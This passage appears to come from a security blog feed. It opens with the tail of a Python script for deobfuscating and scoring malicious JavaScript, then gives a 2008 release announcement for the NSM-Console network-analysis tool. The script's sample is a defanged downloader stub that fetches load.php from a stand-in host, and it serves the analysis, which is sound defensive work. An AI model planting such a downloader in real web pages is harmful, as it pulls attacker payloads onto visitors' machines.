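    "poexali();function poexali(){var ender=document.createElement('object');"
    "try{ender.open('GET','http://example.invalid/load.php',false);}catch(e){}}"
)
SAMPLE_OBF = xor_decode(SAMPLE_JS, 1)

if __name__ == "__main__":
    key, decoded, urls = deobfuscate(SAMPLE_OBF)
    print("key:", key)
    print("decoded:", decoded)
    print("urls:", urls)
```

To run it against the real blob, paste the str value from the page into a variable and call deobfuscate on it; the decoded script is never executed, only scored and searched.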

NSM-Console version 0.7 release
http://writequit.org/blog/2008/04/27/nsm-console-version-07-release/ (Sun, 27 Apr 2008 18:19:34 +0000)

First off, I apologize for the lack of posts here lately, I’ve been trying to come up with something good to post, because I’m just not a fan of rehashing things other blogs post, or commenting on news stories. Hopefully I’ll be able to contribute more soon :)

Now down to the real post, NSM-Console 0.7 has been released, there are a lot of cool features in this release, but first, go download NSM-Console!

As always, you can check out the TODO and CHANGELOG from svn.

Now, let’s cover some of the newest features in this release:

Encode/Decode enhancements
The encode and decode methods have had a few enhancements added to them, most notably, you can now specify a file to encode or decode, instead of specifying just a string, so you could do:

nsm> encode -f base64 testfile.txt
Encoding ascii --> base64...
Output ([]'s added to show beginning and end):
[TlNNLUNvbnNvbGUgaXMgYXdlc29tZSwgeW91IHNob3VsZCB1c2UgaXQgOikK]

Also, you can specify a variety of hex encodings, because I was noticing that it was delineated in a variety of ways, \x, space (or not delineated at all). I’ve also added the default hex and binary methods, so you don’t have to specify endianness, they default to little-endian.

IP->ASN mapping
As per Scholar’s suggestion, there is now both a module and a command for translating an IP into its ASN. You can either use the module to get a listing for each IP in the pcap, or use the command below to get the ASN for just one address:

nsm> ip2asn 203.223.154.86
Bulk mode; whois.cymru.com [2008-04-27 17:53:32 +0000]
17992   | 203.223.154.86   | AIMS-MY-DIA-AS AIMS Data Centre

Thanks to Team Cymru for their ASN servers :)

‘Print’ command supports flags
The print command now supports printing TCP flags, still uses Scholar’s pcapparser library.

New command: ‘iplist’
Generate a list of the ips in a pcap file, sorted by the number of occurrences in the file, see below:

nsm> iplist
=== IP list for data.pcap ===
192.168.1.123   1507
64.233.179.109  260
192.168.1.136   141
204.245.162.17  126
216.178.38.133  102
208.67.217.230  92
209.225.0.103   88
.. etc etc

Pipes now supported
One feature geek00l has been bugging me about is getting piping to work in the nsm shell. I’m happy to announce that pipes finally work; you might run into a few bugs (broken pipes with less), but for the most part they work, and output can now be piped into files and programs:

nsm> p -x 1-* | less
(display all the packets and hex output, piped into less)
nsm> iplist > iplist.txt
(output the list of ips into iplist.txt)
nsm> ip2asn 203.223.154.86 >> iplist.txt
(append the ip2asn output to iplist.txt)

Etc, etc, you get the idea. The ‘<‘ pipe hasn’t been implemented yet, perhaps if it’s needed in the future.

New modules, bro-ids-connection and yahsnarf
Geek00l committed his bro-ids-connection module for generating only connection information from a pcap. A yahsnarf module was also committed, to extract Yahoo IM conversations from a pcap file. Thanks geek00l!

Automatic updating of NSM-Console
Users desiring to be on the bleeding edge of NSM-Console development (is there anyone that actually desires this? :P) can now use the “update” command from within NSM-Console to automatically update from the latest subversion commit. You can also use the -v flag for verbose output, see below:

nsm> update -v
Updating NSM-Console from svn...
Fetching newest revision from svn...
etc, etc

Still a few kinks to work out, but should work pretty well.

Bugfixes
I fixed some bugs related to gzip’d pcap files as well as some bugs in the encode and decode methods. I also introduced some bugs (hurray!) with pipes, but it’s still usable.

Like I always say, check out the full TODO and CHANGELOG for complete details, and send me any feedback you have :)

Protected: Insights
http://writequit.org/blog/2007/06/14/insights/ (Thu, 14 Jun 2007 22:08:08 +0000)

This content is password protected. To view it please enter your password below:
